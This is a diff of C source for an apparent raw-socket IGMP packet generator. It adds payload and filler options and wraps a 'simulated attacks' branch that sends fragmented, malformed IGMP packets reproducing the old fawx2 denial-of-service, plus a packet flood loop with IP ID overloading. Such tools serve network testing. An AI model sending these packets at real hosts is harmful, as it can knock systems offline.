@@ -50,7 +50,6 @@ igmp_info_init(struct pkt_info_igmp *pktigmp) {
   if(pktigmp->type == 0x17)
   strcpy(igmpinfo[23][0]," leave group");
 
-  if(errno != 0) DieWithError("unable to initialize IGMP info array");
 }
 
 extern int
@@ -58,23 +57,33 @@ igmp_shower(int raw_socket, struct sockaddr_in *source, struct sockaddr_in *targ
   struct ipigmp *ip_igmp;  
   struct iphdr *ip;
   struct igmp *igmp;
+  int i = 0;
 
+  packetsize -= sizeof(struct igmp);
 
 /* We use a global buffer to ward off memory leaks *
  * it will be freed when the program exits         */
   buffer = malloc(sizeof(char)*packetsize);
+  if(!buffer) DieWithError("malloc()", ENOMEM);
   ip_igmp = (struct ipigmp*)buffer;
   ip = &ip_igmp->ip;
   igmp = &ip_igmp->igmp;
 
-  memset(buffer, 0xFF, (sizeof(char)*packetsize));
+  memset(buffer, pkt->filler, (sizeof(char)*packetsize));
+
+  /* store the user-specified string in the payload, if there is one.. */
+  if(ctoi(pkt->payload[0]) != 0) {
+   for(; i < strlen(pkt->payload); i++)
+     buffer[(sizeof(struct iphdr) + sizeof(struct igmp)) + i] = pkt->payload[i];
+  }
+
 
   pkt->tot_len = (sizeof(struct igmp) + strlen(buffer));
 
   igmp->igmp_type = pktigmp->type;
   igmp->igmp_code = pktigmp->code;
-  igmp->igmp_group.s_addr = source->sin_addr.s_addr;
-  igmp->igmp_cksum = in_cksum((u_short*)igmp, sizeof(struct igmp));
+  igmp->igmp_group.s_addr = group.s_addr;
+  igmp->igmp_cksum = in_cksum((u_short*)igmp, sizeof(struct igmp), 0);
   
   pkt->tot_len += sizeof(struct iphdr);
 
@@ -93,7 +102,7 @@ igmp_shower(int raw_socket, struct sockaddr_in *source, struct sockaddr_in *targ
   ip->protocol = IPPROTO_IGMP;
   ip->saddr    = source->sin_addr.s_addr;
   ip->daddr    = target->sin_addr.s_addr;
-  ip->check    = in_cksum((u_short*)ip,sizeof(ip));
+  ip->check    = in_cksum((u_short*)ip,sizeof(struct iphdr), 0);
 
   while(packets_sent < pkt->num) {
     /* send first packet */
@@ -106,26 +115,29 @@ igmp_shower(int raw_socket, struct sockaddr_in *source, struct sockaddr_in *targ
     usleep(pkt->delay);
 
   /* for simulated attacks */
-    if(pkt->simtype == 0) { /* fawx2.c */ 
-      ip->frag_off  = htons(8 >> 3);
-      ip->frag_off |= htons(0x2001);
-      ip->check     = in_cksum((u_short*)ip, sizeof(ip));
-      igmp->igmp_type =  2;
-      igmp->igmp_code = 31;
-
-          /* send second packet (simulating fawx2) */
-          if(sendto(raw_socket,
-                    ip_igmp,
-                    pkt->tot_len,
-                    0,
-                    (struct sockaddr*)target,
-                    sizeof(struct sockaddr_in)) < 0) return -1;
-          packets_sent++;
+    if(pkt->simulate == 1) {
+      if(pkt->simtype == 0) { /* fawx2.c */ 
+        ip->frag_off  = htons(8 >> 3);
+        ip->frag_off |= htons(0x2001);
+        ip->check     = in_cksum((u_short*)ip, sizeof(ip), 0);
+        igmp->igmp_type  =  2;
+        igmp->igmp_code  = 31;
+        igmp->igmp_cksum = in_cksum((u_short*)igmp, sizeof(igmp), 0);
+    
+            /* send second packet (simulating fawx2) */
+            if(sendto(raw_socket,
+                      ip_igmp,
+                      pkt->tot_len,
+                      0,
+                      (struct sockaddr*)target,
+                      sizeof(struct sockaddr_in)) < 0) return -1;
+            packets_sent++;
+      }
     }
   /* simulated attacks END */
 
     /* for id overloading */
-    if(pkt->id_of == 1) { ip->id++; ip->id = htons(ip->id) ; ip->check = in_cksum((u_short*)ip, sizeof(ip)); } 
+    if(pkt->id_of == 1) { ip->id++; ip->id = htons(ip->id) ; ip->check = in_cksum((u_short*)ip, sizeof(ip), 0); } 
 
     usleep(pkt->delay);
 
